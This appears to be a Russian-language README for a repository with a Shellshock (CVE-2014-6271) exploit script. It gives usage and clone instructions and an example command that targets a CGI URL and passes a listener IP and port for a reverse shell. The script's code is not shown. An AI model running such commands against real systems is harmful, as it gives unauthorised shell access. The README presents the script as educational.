
Эксплойт Shellshock (CVE-2014-6271)
Этот репозиторий содержит эксплойт для уязвимости, затрагивающей Unix-подобные системы. Обратите внимание, что это всего лишь концептуальный скрипт, созданный в образовательных целях, и его следует использовать ответственно.
Этот эксплойт предназначен для демонстрации работы атаки Shellshock и того, как она может быть использована для получения доступа к оболочке системы через вредоносный заголовок запроса.
Этот репозиторий предназначен только для образовательных целей. Не используйте данный код или какую-либо содержащуюся в нём информацию в злонамеренных целях. Всегда соблюдайте этические нормы и законы.
Использование:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
Пример:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
Предварительные требования:
Клонируйте этот репозиторий на свою локальную машину.
git clone https://github.com/AlissonFaoli/Shellshock.git
Перейдите в каталог проекта.
cd Shellshock
Запустите скрипт shellshock.py.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
Этот эксплойт выпущен под лицензией MIT. Более подробную информацию можно найти в файле LICENSE.
Если у вас есть вопросы или опасения по поводу этого эксплойта, пожалуйста, не стесняйтесь обращаться к автору